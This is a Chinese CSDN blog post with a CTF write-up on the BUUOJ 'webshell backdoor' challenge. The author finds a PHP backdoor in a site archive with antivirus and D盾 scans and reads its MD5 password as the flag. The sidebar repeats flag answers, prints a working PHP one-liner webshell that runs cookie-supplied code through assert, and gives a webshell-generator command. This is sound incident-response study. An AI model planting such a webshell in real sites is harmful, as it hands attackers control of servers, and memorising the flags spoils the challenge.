buuoj webshell后门 writeup

最新推荐文章于 2024-05-11 13:57:12 发布
最新推荐文章于 2024-05-11 13:57:12 发布
阅读量421 收藏
点赞数 2
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130916039
版权

题目(二十二):
【题型】Misc
【题目】webshell后门
【来源】(buuoj)https://buuoj.cn/challenges#webshell%E5%90%8E%E9%97%A8
【思路】用杀毒软件发现后门。
【具体步骤】
Step1:直接将文件放到火绒下进行病毒查杀。
在这里插入图片描述

Step2:病毒扫描发现了后门程序,这就是我们要找的后门。查看详情发现是zp.php文件
在这里插入图片描述
在这里插入图片描述

Step3:用vscode查看文件,直接发现pass变量,得知是MD5密码,得到flag。
在这里插入图片描述

22的卡卡
关注
专栏目录
简单去 webshell 后门方法
Sud0day的博客
03-02 2547
简单去 webshell 后门方法 0x00 前言 因为我的电脑重装系统之后里面的文件都没有了,所以我近期经常会在网上收集工具,木马,并进行测试,但是令我惊讶的是,基本上在网上找到的马都有后门存在,想必各位都不想自己的劳动成果被别人拿走吧。所以我这篇文章就会教大家简单的去后门。 0X01 环境及工具 本次使用到的环境以及工具有: 某 QQ 群随便下的木马 宝塔面板自带文件编辑 nginx/1.14...
BUUCTF__web题解合集(十一)
风过江南乱的博客
10-04 1346
1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询
BUUCTF后门查杀
末初的CSDN博客
09-23 2696
题目地址:https://buuoj.cn/challenges#%E5%90%8E%E9%97%A8%E6%9F%A5%E6%9D%80 下载附件,使用webshell查杀工具:D盾 /include/include.php flag{6ac45fb83b3bc355c024f5034b947dd3}
BUUCTF-MISC-webshell后门
最新发布
2301_80480838的博客
05-11 513
利用D盾工具查杀后门,可以得到webshell后门的位置。打开文件查找密码即可得到flag。下载之后解压缩得到文件夹。
BUUCTF webshell后门
Bnessy
03-25 544
下载附件,是网站源代码,题目说有webshell,那直接拿D盾扫 查看扫出来的后门文件,找到flag
[BUUCTF misc]webshell后门
qq_50665826的博客
07-24 1389
如题: 下载之后解压缩得到文件夹 利用D盾工具查杀后门,可以得到webshell后门的位置 打开文件查找密码即可得到flag flag{ba8e6c6f35a53933b871480bb9a9545c}
BUUCTF MISC——webshell后门
m0_74093152的博客
02-23 455
BUUCTFMISC——webshell后门
Webshell后门查杀
12-20
Webshell后门查杀是网络安全领域中的一个重要环节,主要针对的是网站系统被恶意攻击者植入的WebshellWebshell是一种通过Web服务器漏洞植入的特殊脚本,它允许攻击者通过Web接口对目标服务器进行远程控制,执行任意...
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
并处理判断返回结果,使在线查杀文件不在是梦想~ ...缺点:每次查杀都需要上传文件到WebDir 并等待返回结果 速度比较慢 需要耐心等待 优点:Api 免费 并且不限制上传文件数量。 WEBDIR+采用先进的动态监测技术,结合...
Shuffle::mahjong_red_dragon:WebShell后门框架
05-14
$ python shuffle.py -g webshell.php -p h4x0r Webshel​​l会在shuffle文件夹中生成。 ~ /shuffle/out/webshell.php 连接中 当您将外壳程序上载到计算机时,您需要使用以下命令运行外壳程序: $ python shuffle....
发现隐藏的Webshell后门
MSB_WLAQ的博客
10-06 539
前言: 如何在百万行代码里发现隐藏的后门? 试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来吗?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。 即使是一款拥有 99.9% 的 Webshell 检出率的检测引擎,依然可能存在 Webshell 绕过的情况。另外,像暗链、网页劫持、页面跳转等常见的黑帽 SEO 手法,也很难通过手动检测或工具检测全部识别出来。 最好的方式就是做文件完整性验证。通过与原始代码对比,可以快速发现文件是否被篡改
BUUCTF webshell后门 1
YueXuan_521的博客
11-01 1355
BUUCTF webshell后门 1 传了webshell后门,他把网站打包备份了,你能帮忙找到黑客的webshell在哪吗?(Webshell中的密码(md5)即为答案)2、第一个文件没有flag,但我们在第二个文件中找到了Webshell中的密码,密码也符合md5的格式,这个就是flag值。1、使用工具扫描附件所给的文件夹,可以使用D盾、火绒安全之类的工具,这里我使用D盾。打开D盾,点击自定义扫描,选择附件给的网站文件夹,点击确定。下载附件,解压得到一个网站文件夹。检查出两个文件,我们来挨个查看。
Buuctf webshell后门
Dexret的博客
11-19 2277
下载该文件,发现该文件为一整个网站的源码 结合题意,该题需要我们找到该文件的webshell文件,且flag值为md5值 直接使用D盾扫描该网页源码 发现有多功能大马,和一个已知后门,打开文件所在位置,用notepad++打开该网页源码 发现一段md5的值,判断该值为该题的flag值,尝试后发现能够提交 所以该题的flag为 flag{ba8e6c6f35a53933b871480bb9a9545c} ...
BUUCTF Misc webshell后门
Leslie_LIL的博客
02-28 448
题目如下: 用D盾扫描文件夹 查看文件,找到密码,即可得到flag
应急响应-CTF-BUUCTF-webshell后门 1
theenderofroot的博客
04-12 1034
试一下base64解码出的字符串:flag{fg6sbehpra4co_tnd},可惜是错的,再去找。4、如果想摸个鱼可以直接全局搜索$pass,直接出答案,或者直接用杀毒软件、D盾也行。大概扫了一眼子目录发现upgrade文件夹比较可疑,打开其admin.php。对其中一些部分进行base64解码,没有发现可疑内容,云沙箱也没有报毒。3、最后只能慢慢找了,在member目录下找到一个多功能大马。那还按那道题的思路走,下载、解压、放入PhpStorm。2、先看这个hack文件夹,简直明目张胆啊。
buuctf-misc-webshell后门1
mlws1900的博客
07-25 929
下载附件,得到一堆文件,就是网站的源代码,解压后找后门文件就行了。在文件中找到pass,也就是密码。
BUUCTF webshell后门 writeup
zhangzhaolin12的博客
10-11 766
下载后是一些PHP文件,既然是webshell后门就用D盾扫描一下。 扫描出来的有两个级别5的,但是题目既然说是后门,其中有一个说明里就是已知后门,我就想先看看这个,结果这里面都是一下base64编码的东西,解码后并没有找到MD5的passWord,所以只能再看看第一个,结果一下就开到了pass的值是一个MD5格式的。那这个就是flag了。 $pass = 'ba8e6c6f35a53933b871480bb9a9545c'; //angel ...
BUUCTF misc 专题(30)webshell后门
tt_npc的博客
11-20 5049
看题目,又是一道后门查杀的题目,下载了资源以后我们发现是一个rar的文件 解压里面的文件后打开D盾进行后门查杀 在这里找到了,并根据路径打开所在的文件夹,找到文件 根据题目提示,我们在这里找到了md5 再根据md5中的pass我们可以找到pass 包上flag就是答案了 flag{ba8e6c6f35a53933b871480bb9a9545c} ...
webshell后门
07-27
Webshell后门是指一段网页代码,通常是ASP、ASP.NET、PHP、JSP等语言编写的,用于在服务器端进行一些危险操作,获取敏感信息或控制服务器的控制权。攻击者通过Webshell后门可以执行各种操作,比如上传、下载、删除文件,执行系统命令等。\[2\] 一个常见的Webshell后门示例是PHP代码,如下所示: ```php <?php @$a = $_COOKIE\[1\]; $b =''; $c=''; @assert($b.$a); ?> ``` 这段代码通过读取名为1的Cookie值,并使用assert函数执行该值作为PHP代码。攻击者可以通过设置Cookie来执行任意的PHP代码,从而控制服务器。\[1\] 为了防止Webshell后门的滥用,建议在服务器上加强安全措施,如定期更新软件补丁、限制文件上传权限、使用安全的密码策略等。此外,对于已经感染Webshell后门的服务器,应及时清除后门文件,并进行系统安全审计,以确保服务器的安全性。\[2\] #### 引用[.reference_title] - *1* [WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)](https://blog.csdn.net/weixin_43263566/article/details/128748547)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [网络攻防|Web后门知识详解](https://blog.csdn.net/weixin_42282189/article/details/120981598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值